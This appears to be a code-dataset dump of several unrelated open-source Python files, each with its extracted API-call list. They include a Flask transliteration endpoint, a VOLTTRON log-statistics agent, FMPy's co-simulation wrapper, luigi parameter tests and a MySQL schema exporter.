# for idx, clus in enumerate(cluster):
# logging.info('exporting cluster %s %s %s %d', root,s,action,idx)
# for f in clus:
# dumpFile = pathMapping[1][int(f)]
#
# t = dumpFile,root,level,clusterPath,s,action,token,idx
# workList.append(t)
from abstractPatch import dumpFilesCore
parallelRun(dumpFilesCore,workList)
# for wl in workList:
# dumpFilesCore(wl)
| [((24, 14, 24, 26), 'pairs.shapePairs', 'shapePairs', ({}, {}), '()', False, 'from pairs import shapePairs\n'), ((28, 4, 28, 24), 'pairs.createPairs', 'createPairs', ({(28, 16, 28, 23): 'matches'}, {}), '(matches)', False, 'from pairs import createPairs\n'), ((31, 4, 31, 17), 'pairs.importShape', 'importShape', ({}, {}), '()', False, 'from pairs import importShape\n'), ((88, 8, 88, 33), 'networkx.Graph', 'networkx.Graph', ({(88, 23, 88, 32): 'col_combi'}, {}), '(col_combi)', False, 'import networkx\n'), ((90, 20, 90, 61), 'networkx.connected_component_subgraphs', 'networkx.connected_component_subgraphs', ({(90, 59, 90, 60): 'g'}, {}), '(g)', False, 'import networkx\n'), ((77, 17, 77, 48), 'abstractPatch.loadPairMulti', 'loadPairMulti', ({(77, 31, 77, 35): 'root', (77, 36, 77, 38): '""""""', (77, 39, 77, 47): '"""shapes"""'}, {}), "(root, '', 'shapes')", False, 'from abstractPatch import loadPairMulti\n')] |
aosjehdgus/transliteration | app.py | 1934999385863009cdf9f8806e949157d653a9f4 | # -*- coding: utf-8 -*-
import os
import sys
import tensorflow as tf
import numpy as np
import data_utils
from translate import Transliteration
from flask import Flask, request, jsonify
transliteration = Transliteration()
app = Flask(__name__) # Declare the Flask object; the argument is the application package name.
app.config['JSON_AS_ASCII'] = False # Allow non-ASCII (Korean) text in JSON responses.
@app.route("/transliterate", methods=['GET'])
def transliterate():
input = request.args.get('input')
output = transliteration.run(input)
learned = transliteration.is_learned(input)
print(input, learned)
return jsonify(output)
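# Example request (hypothetical host; port 80 comes from app.run below):
#   curl 'http://localhost/transliterate?input=hello'
# responds with the transliterated output as JSON.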
if __name__ == "__main__":
app.run(debug = True, host='0.0.0.0', port=80, use_reloader=False)
| [((10, 18, 10, 35), 'translate.Transliteration', 'Transliteration', ({}, {}), '()', False, 'from translate import Transliteration\n'), ((12, 6, 12, 21), 'flask.Flask', 'Flask', ({(12, 12, 12, 20): '__name__'}, {}), '(__name__)', False, 'from flask import Flask, request, jsonify\n'), ((18, 10, 18, 35), 'flask.request.args.get', 'request.args.get', ({(18, 27, 18, 34): '"""input"""'}, {}), "('input')", False, 'from flask import Flask, request, jsonify\n'), ((23, 9, 23, 24), 'flask.jsonify', 'jsonify', ({(23, 17, 23, 23): 'output'}, {}), '(output)', False, 'from flask import Flask, request, jsonify\n')] |
mental689/pyano | pyano2/apps.py | 2bc75e79618392f2013dfde2ac8035fe5fa1dc61 | from django.apps import AppConfig
class Pyano2Config(AppConfig):
name = 'pyano2'
| [] |
cbeall123/E3SM | cime/scripts/lib/CIME/XML/env_build.py | ec32b40d549b292f14acd11e6774686564539d3c | """
Interface to the env_build.xml file. This class inherits from EnvBase
"""
from CIME.XML.standard_module_setup import *
from CIME.XML.env_base import EnvBase
logger = logging.getLogger(__name__)
class EnvBuild(EnvBase):
# pylint: disable=unused-argument
def __init__(self, case_root=None, infile="env_build.xml",components=None):
"""
initialize an object interface to file env_build.xml in the case directory
"""
schema = os.path.join(get_cime_root(), "config", "xml_schemas", "env_entry_id.xsd")
EnvBase.__init__(self, case_root, infile, schema=schema)
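# Illustrative use (the case path is hypothetical): constructed from inside a
# case directory,
#   env = EnvBuild(case_root='.')
# reads ./env_build.xml, presumably validated against env_entry_id.xsd.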
| [((17, 8, 17, 64), 'CIME.XML.env_base.EnvBase.__init__', 'EnvBase.__init__', (), '', False, 'from CIME.XML.env_base import EnvBase\n')] |
gnmerritt/volttron | services/ops/LogStatisticsAgent/logstatisticsagent/agent.py | ebfbf62bab77d46fd3e8d6aaca1fc4f33932ccf3 | # -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright 2019, Battelle Memorial Institute.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This material was prepared as an account of work sponsored by an agency of
# the United States Government. Neither the United States Government nor the
# United States Department of Energy, nor Battelle, nor any of their
# employees, nor any jurisdiction or organization that has cooperated in the
# development of these materials, makes any warranty, express or
# implied, or assumes any legal liability or responsibility for the accuracy,
# completeness, or usefulness or any information, apparatus, product,
# software, or process disclosed, or represents that its use would not infringe
# privately owned rights. Reference herein to any specific commercial product,
# process, or service by trade name, trademark, manufacturer, or otherwise
# does not necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors expressed
# herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY operated by
# BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
import datetime
import logging
import os
import sys
import statistics
from volttron.platform.vip.agent import Agent, RPC, Core
from volttron.platform.agent import utils
from volttron.platform.agent.utils import get_aware_utc_now
utils.setup_logging()
_log = logging.getLogger(__name__)
__version__ = '1.0'
def log_statistics(config_path, **kwargs):
"""Load the LogStatisticsAgent agent configuration and returns and instance
of the agent created using that configuration.
:param config_path: Path to a configuration file.
:type config_path: str
:returns: LogStatisticsAgent agent instance
:rtype: LogStatisticsAgent agent
"""
config = utils.load_config(config_path)
return LogStatisticsAgent(config, **kwargs)
class LogStatisticsAgent(Agent):
"""
    LogStatisticsAgent reads the volttron.log file size at the configured
    interval, computes the size delta from the previous reading and publishes
    the difference with a timestamp. It also publishes the standard deviation
    of the deltas every 24 hours.
:param config: Configuration dict
:type config: dict
Example configuration:
.. code-block:: python
{
"file_path" : "/home/volttron/volttron.log",
"analysis_interval_sec" : 60,
"publish_topic" : "platform/log_statistics",
"historian_topic" : "analysis/log_statistics"
}
"""
def __init__(self, config, **kwargs):
super(LogStatisticsAgent, self).__init__(**kwargs)
self.analysis_interval_sec = config["analysis_interval_sec"]
self.file_path = config["file_path"]
self.publish_topic = config["publish_topic"]
self.historian_topic = config["historian_topic"]
self.size_delta_list = []
self.file_start_size = None
self.prev_file_size = None
self._scheduled_event = None
@Core.receiver('onstart')
def starting(self, sender, **kwargs):
_log.info("Starting " + self.__class__.__name__ + " agent")
self.publish_analysis()
def publish_analysis(self):
"""
        Publishes the file's size increment over the previous time interval
        (60 minutes) with a timestamp.
        Also publishes the standard deviation of the file's hourly size
        differences every 24 hours.
"""
if self._scheduled_event is not None:
self._scheduled_event.cancel()
if self.prev_file_size is None:
self.prev_file_size = self.get_file_size()
_log.debug("init_file_size = {}".format(self.prev_file_size))
else:
# read file size
curr_file_size = self.get_file_size()
# calculate size delta
size_delta = curr_file_size - self.prev_file_size
self.prev_file_size = curr_file_size
self.size_delta_list.append(size_delta)
headers = {'Date': datetime.datetime.utcnow().isoformat() + 'Z'}
publish_message = {'timestamp': datetime.datetime.utcnow().isoformat() + 'Z',
'log_size_delta': size_delta}
historian_message = [{"log_size_delta ": size_delta},
{"log_size_delta ": {'units': 'bytes', 'tz': 'UTC', 'type': 'float'}}]
if len(self.size_delta_list) == 24:
standard_deviation = statistics.stdev(self.size_delta_list)
publish_message['log_std_dev'] = standard_deviation
historian_message[0]['log_std_dev'] = standard_deviation
historian_message[1]['log_std_dev'] = {'units': 'bytes', 'tz': 'UTC', 'type': 'float'}
_log.debug('publishing message {} with header {} on historian topic {}'
.format(historian_message, headers, self.historian_topic))
self.vip.pubsub.publish(peer="pubsub", topic=self.historian_topic, headers = headers,
message=historian_message)
self.size_delta_list = []
_log.debug('publishing message {} on topic {}'.format(publish_message, self.publish_topic))
self.vip.pubsub.publish(peer="pubsub", topic=self.publish_topic,
message=publish_message)
_log.debug('Scheduling next periodic call')
now = get_aware_utc_now()
next_update_time = now + datetime.timedelta(
seconds=self.analysis_interval_sec)
self._scheduled_event = self.core.schedule(
next_update_time, self.publish_analysis)
def get_file_size(self):
try:
return os.path.getsize(self.file_path)
except OSError as e:
_log.error(e)
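# Illustrative payload shapes from publish_analysis (values hypothetical):
#   publish_topic  : {'timestamp': '...Z', 'log_size_delta': 1234}
#                    plus 'log_std_dev' on every 24th sample
#   historian_topic: [{'log_size_delta': 1234},
#                     {'log_size_delta': {'units': 'bytes', 'tz': 'UTC', 'type': 'float'}}]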
def main(argv=sys.argv):
"""Main method called by the platform."""
utils.vip_main(log_statistics, identity='platform.logstatisticsagent')
if __name__ == '__main__':
# Entry point for script
try:
sys.exit(main())
except KeyboardInterrupt:
pass
| [((49, 0, 49, 21), 'volttron.platform.agent.utils.setup_logging', 'utils.setup_logging', ({}, {}), '()', False, 'from volttron.platform.agent import utils\n'), ((50, 7, 50, 34), 'logging.getLogger', 'logging.getLogger', ({(50, 25, 50, 33): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((64, 13, 64, 43), 'volttron.platform.agent.utils.load_config', 'utils.load_config', ({(64, 31, 64, 42): 'config_path'}, {}), '(config_path)', False, 'from volttron.platform.agent import utils\n'), ((97, 5, 97, 29), 'volttron.platform.vip.agent.Core.receiver', 'Core.receiver', ({(97, 19, 97, 28): '"""onstart"""'}, {}), "('onstart')", False, 'from volttron.platform.vip.agent import Agent, RPC, Core\n'), ((166, 4, 166, 74), 'volttron.platform.agent.utils.vip_main', 'utils.vip_main', (), '', False, 'from volttron.platform.agent import utils\n'), ((150, 14, 150, 33), 'volttron.platform.agent.utils.get_aware_utc_now', 'get_aware_utc_now', ({}, {}), '()', False, 'from volttron.platform.agent.utils import get_aware_utc_now\n'), ((151, 33, 152, 47), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((159, 19, 159, 50), 'os.path.getsize', 'os.path.getsize', ({(159, 35, 159, 49): 'self.file_path'}, {}), '(self.file_path)', False, 'import os\n'), ((133, 37, 133, 75), 'statistics.stdev', 'statistics.stdev', ({(133, 54, 133, 74): 'self.size_delta_list'}, {}), '(self.size_delta_list)', False, 'import statistics\n'), ((125, 31, 125, 57), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ({}, {}), '()', False, 'import datetime\n'), ((127, 44, 127, 70), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ({}, {}), '()', False, 'import datetime\n')] |
sseits-skku/its-backend | apps/inventory/serializers.py | faf020568b930aaff4958d47602c511aad8a6c8e | from rest_framework.serializers import ModelSerializer
from .models import Place, Status, OSType, Stock, ComputerStock
class PlaceSerializer(ModelSerializer):
class Meta:
model = Place
fields = '__all__'
class StatusSerializer(ModelSerializer):
class Meta:
model = Status
fields = '__all__'
class OSTypeSerializer(ModelSerializer):
class Meta:
model = OSType
fields = '__all__'
class StockSerializer(ModelSerializer):
class Meta:
model = Stock
fields = '__all__'
class ComputerStockSerializer(ModelSerializer):
class Meta:
model = ComputerStock
fields = '__all__'
| [] |
CSchulzeTLK/FMPy | fmpy/cswrapper/__init__.py | fde192346c36eb69dbaca60a96e80cdc8ef37b89 |
def add_cswrapper(filename, outfilename=None):
from fmpy import read_model_description, extract, sharedLibraryExtension, platform, __version__
from lxml import etree
import os
from shutil import copyfile, rmtree
if outfilename is None:
outfilename = filename
model_description = read_model_description(filename)
if model_description.fmiVersion != '2.0':
raise Exception("%s is not an FMI 2.0 FMU." % filename)
if model_description.modelExchange is None:
raise Exception("%s does not support Model Exchange." % filename)
unzipdir = extract(filename)
xml = os.path.join(unzipdir, 'modelDescription.xml')
tree = etree.parse(xml)
root = tree.getroot()
# update description
generation_tool = root.attrib.get('generationTool', 'Unknown') + " with FMPy %s Co-Simulation wrapper" % __version__
root.attrib['generationTool'] = generation_tool
# remove any existing <CoSimulation> element
for e in root.findall('CoSimulation'):
root.remove(e)
for i, child in enumerate(root):
if child.tag == 'ModelExchange':
break
model_identifier = '%s_%s_%s' % (model_description.modelExchange.modelIdentifier,
model_description.numberOfContinuousStates,
model_description.numberOfEventIndicators)
e = etree.Element("CoSimulation")
e.attrib['modelIdentifier'] = model_identifier
root.insert(i + 1, e)
tree.write(xml, pretty_print=True, encoding='utf-8')
shared_library = os.path.join(os.path.dirname(__file__), 'cswrapper' + sharedLibraryExtension)
license_file = os.path.join(os.path.dirname(__file__), 'license.txt')
licenses_dir = os.path.join(unzipdir, 'documentation', 'licenses')
if not os.path.isdir(licenses_dir):
os.mkdir(licenses_dir)
copyfile(src=shared_library, dst=os.path.join(unzipdir, 'binaries', platform, model_identifier + sharedLibraryExtension))
copyfile(license_file, os.path.join(unzipdir, 'documentation', 'licenses', 'fmpy-cswrapper.txt'))
create_zip_archive(outfilename, unzipdir)
rmtree(unzipdir, ignore_errors=True)
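# Example usage (the FMU file names are hypothetical):
#   from fmpy.cswrapper import add_cswrapper
#   add_cswrapper('CoupledClutches.fmu', outfilename='CoupledClutches_cs.fmu')
# wraps the Model Exchange FMU so it can also be run in Co-Simulation mode.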
def create_zip_archive(filename, source_dir):
import zipfile
import os
with zipfile.ZipFile(filename, 'w', zipfile.ZIP_DEFLATED) as zf:
base_path = os.path.normpath(source_dir)
for dirpath, dirnames, filenames in os.walk(source_dir):
for name in sorted(dirnames):
path = os.path.normpath(os.path.join(dirpath, name))
zf.write(path, os.path.relpath(path, base_path))
for name in filenames:
path = os.path.normpath(os.path.join(dirpath, name))
if os.path.isfile(path):
zf.write(path, os.path.relpath(path, base_path))
| [((13, 24, 13, 56), 'fmpy.read_model_description', 'read_model_description', ({(13, 47, 13, 55): 'filename'}, {}), '(filename)', False, 'from fmpy import read_model_description, extract, sharedLibraryExtension, platform, __version__\n'), ((21, 15, 21, 32), 'fmpy.extract', 'extract', ({(21, 23, 21, 31): 'filename'}, {}), '(filename)', False, 'from fmpy import read_model_description, extract, sharedLibraryExtension, platform, __version__\n'), ((23, 10, 23, 56), 'os.path.join', 'os.path.join', ({(23, 23, 23, 31): 'unzipdir', (23, 33, 23, 55): '"""modelDescription.xml"""'}, {}), "(unzipdir, 'modelDescription.xml')", False, 'import os\n'), ((25, 11, 25, 27), 'lxml.etree.parse', 'etree.parse', ({(25, 23, 25, 26): 'xml'}, {}), '(xml)', False, 'from lxml import etree\n'), ((45, 8, 45, 37), 'lxml.etree.Element', 'etree.Element', ({(45, 22, 45, 36): '"""CoSimulation"""'}, {}), "('CoSimulation')", False, 'from lxml import etree\n'), ((54, 19, 54, 70), 'os.path.join', 'os.path.join', ({(54, 32, 54, 40): 'unzipdir', (54, 42, 54, 57): '"""documentation"""', (54, 59, 54, 69): '"""licenses"""'}, {}), "(unzipdir, 'documentation', 'licenses')", False, 'import os\n'), ((64, 4, 64, 40), 'shutil.rmtree', 'rmtree', (), '', False, 'from shutil import copyfile, rmtree\n'), ((51, 34, 51, 59), 'os.path.dirname', 'os.path.dirname', ({(51, 50, 51, 58): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((52, 32, 52, 57), 'os.path.dirname', 'os.path.dirname', ({(52, 48, 52, 56): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((56, 11, 56, 38), 'os.path.isdir', 'os.path.isdir', ({(56, 25, 56, 37): 'licenses_dir'}, {}), '(licenses_dir)', False, 'import os\n'), ((57, 8, 57, 30), 'os.mkdir', 'os.mkdir', ({(57, 17, 57, 29): 'licenses_dir'}, {}), '(licenses_dir)', False, 'import os\n'), ((60, 27, 60, 100), 'os.path.join', 'os.path.join', ({(60, 40, 60, 48): 'unzipdir', (60, 50, 60, 65): '"""documentation"""', (60, 67, 60, 77): '"""licenses"""', (60, 79, 60, 99): '"""fmpy-cswrapper.txt"""'}, {}), "(unzipdir, 'documentation', 'licenses', 'fmpy-cswrapper.txt')", False, 'import os\n'), ((72, 9, 72, 61), 'zipfile.ZipFile', 'zipfile.ZipFile', ({(72, 25, 72, 33): 'filename', (72, 35, 72, 38): '"""w"""', (72, 40, 72, 60): 'zipfile.ZIP_DEFLATED'}, {}), "(filename, 'w', zipfile.ZIP_DEFLATED)", False, 'import zipfile\n'), ((73, 20, 73, 48), 'os.path.normpath', 'os.path.normpath', ({(73, 37, 73, 47): 'source_dir'}, {}), '(source_dir)', False, 'import os\n'), ((74, 44, 74, 63), 'os.walk', 'os.walk', ({(74, 52, 74, 62): 'source_dir'}, {}), '(source_dir)', False, 'import os\n'), ((59, 37, 59, 124), 'os.path.join', 'os.path.join', ({(59, 50, 59, 58): 'unzipdir', (59, 60, 59, 70): '"""binaries"""', (59, 72, 59, 80): 'platform', (59, 82, 59, 123): '(model_identifier + sharedLibraryExtension)'}, {}), "(unzipdir, 'binaries', platform, model_identifier +\n sharedLibraryExtension)", False, 'import os\n'), ((80, 19, 80, 39), 'os.path.isfile', 'os.path.isfile', ({(80, 34, 80, 38): 'path'}, {}), '(path)', False, 'import os\n'), ((76, 40, 76, 67), 'os.path.join', 'os.path.join', ({(76, 53, 76, 60): 'dirpath', (76, 62, 76, 66): 'name'}, {}), '(dirpath, name)', False, 'import os\n'), ((77, 31, 77, 63), 'os.path.relpath', 'os.path.relpath', ({(77, 47, 77, 51): 'path', (77, 53, 77, 62): 'base_path'}, {}), '(path, base_path)', False, 'import os\n'), ((79, 40, 79, 67), 'os.path.join', 'os.path.join', ({(79, 53, 79, 60): 'dirpath', (79, 62, 79, 66): 'name'}, {}), '(dirpath, name)', False, 'import os\n'), ((81, 35, 81, 67), 'os.path.relpath', 
'os.path.relpath', ({(81, 51, 81, 55): 'path', (81, 57, 81, 66): 'base_path'}, {}), '(path, base_path)', False, 'import os\n')] |
shouldsee/luigi | test/dict_parameter_test.py | 54a347361ae1031f06105eaf30ff88f5ef65b00c | # -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from helpers import unittest, in_parse
import luigi
import luigi.interface
import json
import collections
class DictParameterTask(luigi.Task):
param = luigi.DictParameter()
class DictParameterTest(unittest.TestCase):
_dict = collections.OrderedDict([('username', 'me'), ('password', 'secret')])
def test_parse(self):
d = luigi.DictParameter().parse(json.dumps(DictParameterTest._dict))
self.assertEqual(d, DictParameterTest._dict)
def test_serialize(self):
d = luigi.DictParameter().serialize(DictParameterTest._dict)
self.assertEqual(d, '{"username": "me", "password": "secret"}')
def test_parse_and_serialize(self):
inputs = ['{"username": "me", "password": "secret"}', '{"password": "secret", "username": "me"}']
for json_input in inputs:
_dict = luigi.DictParameter().parse(json_input)
self.assertEqual(json_input, luigi.DictParameter().serialize(_dict))
def test_parse_interface(self):
in_parse(["DictParameterTask", "--param", '{"username": "me", "password": "secret"}'],
lambda task: self.assertEqual(task.param, DictParameterTest._dict))
def test_serialize_task(self):
t = DictParameterTask(DictParameterTest._dict)
self.assertEqual(str(t), 'DictParameterTask(param={"username": "me", "password": "secret"})')
def test_parse_invalid_input(self):
self.assertRaises(ValueError, lambda: luigi.DictParameter().parse('{"invalid"}'))
def test_hash_normalize(self):
self.assertRaises(TypeError, lambda: hash(luigi.DictParameter().parse('{"a": {"b": []}}')))
a = luigi.DictParameter().normalize({"a": [{"b": []}]})
b = luigi.DictParameter().normalize({"a": [{"b": []}]})
self.assertEqual(hash(a), hash(b))
| [((27, 12, 27, 33), 'luigi.DictParameter', 'luigi.DictParameter', ({}, {}), '()', False, 'import luigi\n'), ((32, 12, 32, 81), 'collections.OrderedDict', 'collections.OrderedDict', ({(32, 36, 32, 80): "[('username', 'me'), ('password', 'secret')]"}, {}), "([('username', 'me'), ('password', 'secret')])", False, 'import collections\n'), ((35, 40, 35, 75), 'json.dumps', 'json.dumps', ({(35, 51, 35, 74): 'DictParameterTest._dict'}, {}), '(DictParameterTest._dict)', False, 'import json\n'), ((35, 12, 35, 33), 'luigi.DictParameter', 'luigi.DictParameter', ({}, {}), '()', False, 'import luigi\n'), ((39, 12, 39, 33), 'luigi.DictParameter', 'luigi.DictParameter', ({}, {}), '()', False, 'import luigi\n'), ((61, 12, 61, 33), 'luigi.DictParameter', 'luigi.DictParameter', ({}, {}), '()', False, 'import luigi\n'), ((62, 12, 62, 33), 'luigi.DictParameter', 'luigi.DictParameter', ({}, {}), '()', False, 'import luigi\n'), ((45, 20, 45, 41), 'luigi.DictParameter', 'luigi.DictParameter', ({}, {}), '()', False, 'import luigi\n'), ((46, 41, 46, 62), 'luigi.DictParameter', 'luigi.DictParameter', ({}, {}), '()', False, 'import luigi\n'), ((57, 46, 57, 67), 'luigi.DictParameter', 'luigi.DictParameter', ({}, {}), '()', False, 'import luigi\n'), ((60, 50, 60, 71), 'luigi.DictParameter', 'luigi.DictParameter', ({}, {}), '()', False, 'import luigi\n')] |
treeyh/echoscope | echoscope/source/mysql_source.py | ef8933ce9a5dfe2ac8fb6e82bad8d5fa0d72a6da | # -*- coding: UTF-8 -*-
import logging
from typing import List
from echoscope.config import config
from echoscope.util import mysql_util, str_util, log_util
from echoscope.model import ds_model, config_model
from echoscope.source import source
class MysqlSource(source.Source):
def __init__(self):
self.excludesDb = ['information_schema', 'performance_schema', 'mysql', 'sys', 'test']
def export_model(self, conf: config_model.DataSourceConfig) -> ds_model.DataSourceModel:
mysqlUtil = mysql_util.get_mysql_util(
host=conf.host, port=conf.port, user=conf.user, passwd=conf.passwd, db=conf.db, charset=conf.charset)
ver = self.get_db_version(mysqlUtil)
if ver == '':
logging.error(' mysql conn fail. ')
return
dsm = ds_model.DataSourceModel(
name='%s:%d' % (conf.host, conf.port), dbType=config.DsMysql, version=ver)
dsm.dbs = self.get_export_dbs(mysqlUtil, conf.includes, conf.excludes)
dsm = self.fill_table_fields(mysqlUtil, dsm)
return dsm
def get_db_version(self, conn: mysql_util.MysqlUtil) -> str:
"""获取mysql版本
Args:
conn (mysql_util.MysqlUtil): [description]
Returns:
str: [description]
"""
sql = 'select version() as ver from dual'
cols = ['ver']
ver = conn.find_one(sql, (), cols)
return '' if ver == None else str_util.format_bytes_to_str(ver.get('ver', ''))
def get_export_dbs(self, conn: mysql_util.MysqlUtil, includes: List[str] = [], excludes: List[str] = []) -> List[ds_model.DbModel]:
"""获取需要导出结构的数据库列表
Args:
conn (mysql_util.MysqlUtil): 数据库连接
includes (List[str], optional): 需要包含的数据库列表. Defaults to [].
excludes (List[str], optional): 需要排除的数据库列表. Defaults to [].
Returns:
List[ds_model.DbModel]: 需要导出的数据库列表
"""
sql = 'select SCHEMA_NAME AS db_name, DEFAULT_CHARACTER_SET_NAME as charset, DEFAULT_COLLATION_NAME as collation_name from `information_schema`.SCHEMATA '
cols = ['db_name', 'charset', 'collation_name']
data = conn.find_all(sql, (), cols)
dbs = []
for d in data:
db_name = str_util.format_bytes_to_str(d['db_name'])
if db_name in self.excludesDb or db_name in excludes:
        # excluded explicitly
continue
if len(includes) > 0 and db_name not in includes:
        # not in the includes whitelist
continue
charset = str_util.format_bytes_to_str(d['charset'])
collation_name = str_util.format_bytes_to_str(d['collation_name'])
dbModel = ds_model.DbModel(
name=db_name, charset=charset, collation_name=collation_name)
dbs.append(dbModel)
return dbs
def fill_table_fields(self, conn: mysql_util.MysqlUtil, dsModel: ds_model.DataSourceModel) -> ds_model.DataSourceModel:
"""获取数据库中的表信息
Args:
conn (mysql_util.MysqlUtil): 数据库连接
dsModel (ds_model.DataSourceModel): 数据源,包含数据库列表
Returns:
ds_model.DataSourceModel: 数据源
"""
sql = ''' select TABLE_NAME, `ENGINE`, TABLE_COLLATION, TABLE_COMMENT from information_schema.`TABLES` where TABLE_SCHEMA = %s and TABLE_TYPE = 'BASE TABLE' '''
cols = ['TABLE_NAME', 'ENGINE', 'TABLE_COLLATION', 'TABLE_COMMENT']
for db in dsModel.dbs:
data = conn.find_all(sql, (db.name, ), cols)
tables: ds_model.TableModel = []
for d in data:
tableName = str_util.format_bytes_to_str(d['TABLE_NAME'])
comment = str_util.format_bytes_to_str(d['TABLE_COMMENT'])
collation_name = str_util.format_bytes_to_str(d['TABLE_COLLATION'])
engine = str_util.format_bytes_to_str(d['ENGINE'])
table = ds_model.TableModel(
name=tableName, comment=comment, collation_name=collation_name, engine=engine)
logging.info('load table:%s fields.' % tableName)
table.fields = self.get_fields(conn, db.name, tableName)
table.create_script = self.get_create_script(conn, db.name, tableName)
tables.append(table)
db.tables = tables
return dsModel
def get_create_script(self, conn: mysql_util.MysqlUtil, dbName: str, tableName: str) -> str:
"""获取表的创建脚本
Args:
conn (mysql_util.MysqlUtil): 数据库连接
dbName (str): 数据库名称
tableName (str): 表名称
Returns:
str: 创建脚本
"""
sql = ''' SHOW CREATE TABLE `%s`.`%s` ''' % (dbName, tableName)
cols = ['Table', 'Create Table']
data = conn.find_one(sql, (), cols)
return '' if data == None else str_util.format_bytes_to_str(data.get('Create Table', ''))
def get_fields(self, conn: mysql_util.MysqlUtil, dbName: str, tableName: str) -> List[ds_model.FieldModel]:
"""获取数据表中列信息
Args:
conn (mysql_util.MysqlUtil): 数据库连接
dbName (str): 数据库名
tableName (str): 表名
Returns:
List[ds_model.FieldModel]: 列列表
"""
sql = ''' select TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME, ORDINAL_POSITION, COLUMN_DEFAULT, IS_NULLABLE, DATA_TYPE, CHARACTER_MAXIMUM_LENGTH, NUMERIC_PRECISION, NUMERIC_SCALE, CHARACTER_SET_NAME, COLLATION_NAME, COLUMN_TYPE, COLUMN_KEY, EXTRA, COLUMN_COMMENT from information_schema.`columns` where TABLE_SCHEMA = %s and TABLE_NAME = %s ORDER BY TABLE_SCHEMA DESC, TABLE_NAME DESC, ORDINAL_POSITION ASC '''
cols = ['TABLE_SCHEMA', 'TABLE_NAME', 'COLUMN_NAME', 'ORDINAL_POSITION', 'COLUMN_DEFAULT',
'IS_NULLABLE', 'DATA_TYPE', 'CHARACTER_MAXIMUM_LENGTH', 'NUMERIC_PRECISION', 'NUMERIC_SCALE',
'CHARACTER_SET_NAME', 'COLLATION_NAME', 'COLUMN_TYPE', 'COLUMN_KEY', 'EXTRA', 'COLUMN_COMMENT']
data = conn.find_all(sql, (dbName, tableName, ), cols)
fields = []
for d in data:
fname = str_util.format_bytes_to_str(d['COLUMN_NAME'])
ftype = str_util.format_bytes_to_str(d['DATA_TYPE'])
      column_type = str_util.format_bytes_to_str(d['COLUMN_TYPE'])
length = str_util.format_bytes_to_str(
d['CHARACTER_MAXIMUM_LENGTH']) if d['CHARACTER_MAXIMUM_LENGTH'] != None else str_util.format_bytes_to_str(d['NUMERIC_PRECISION'])
scale = str_util.format_bytes_to_str(d['NUMERIC_SCALE'])
# on update CURRENT_TIMESTAMP
default = str_util.format_bytes_to_str(d['COLUMN_DEFAULT'])
ext = str_util.format_bytes_to_str(d['EXTRA'])
if default == 'CURRENT_TIMESTAMP':
if 'on update CURRENT_TIMESTAMP' in ext:
default = 'update_time'
else:
default = 'create_time'
nullFlag = str_util.format_bytes_to_str(d['IS_NULLABLE'])
comment = str_util.format_bytes_to_str(d['COLUMN_COMMENT'])
charset = str_util.format_bytes_to_str(d['CHARACTER_SET_NAME'])
collation_name = str_util.format_bytes_to_str(d['COLLATION_NAME'])
indexFlag = 0
column_key = str_util.format_bytes_to_str(d['COLUMN_KEY'])
if column_key == 'PRI':
indexFlag = 1
elif column_key == 'UNI':
indexFlag = 3
elif column_key == 'MUL':
indexFlag = 2
indexName = ''
autoInc = False
if 'auto_increment' in ext:
autoInc = True
field = ds_model.FieldModel(name=fname, ftype=ftype, length=length, scale=scale, default=default, nullFlag=nullFlag,
comment=comment, charset=charset, collation_name=collation_name, indexFlag=indexFlag, indexName=indexName, autoInc=autoInc)
fields.append(field)
return fields
| [((18, 16, 19, 109), 'echoscope.util.mysql_util.get_mysql_util', 'mysql_util.get_mysql_util', (), '', False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((25, 10, 26, 82), 'echoscope.model.ds_model.DataSourceModel', 'ds_model.DataSourceModel', (), '', False, 'from echoscope.model import ds_model, config_model\n'), ((23, 6, 23, 41), 'logging.error', 'logging.error', ({(23, 20, 23, 40): '""" mysql conn fail. """'}, {}), "(' mysql conn fail. ')", False, 'import logging\n'), ((66, 16, 66, 58), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(66, 45, 66, 57): "d['db_name']"}, {}), "(d['db_name'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((74, 16, 74, 58), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(74, 45, 74, 57): "d['charset']"}, {}), "(d['charset'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((75, 23, 75, 72), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(75, 52, 75, 71): "d['collation_name']"}, {}), "(d['collation_name'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((76, 16, 77, 71), 'echoscope.model.ds_model.DbModel', 'ds_model.DbModel', (), '', False, 'from echoscope.model import ds_model, config_model\n'), ((149, 14, 149, 60), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(149, 43, 149, 59): "d['COLUMN_NAME']"}, {}), 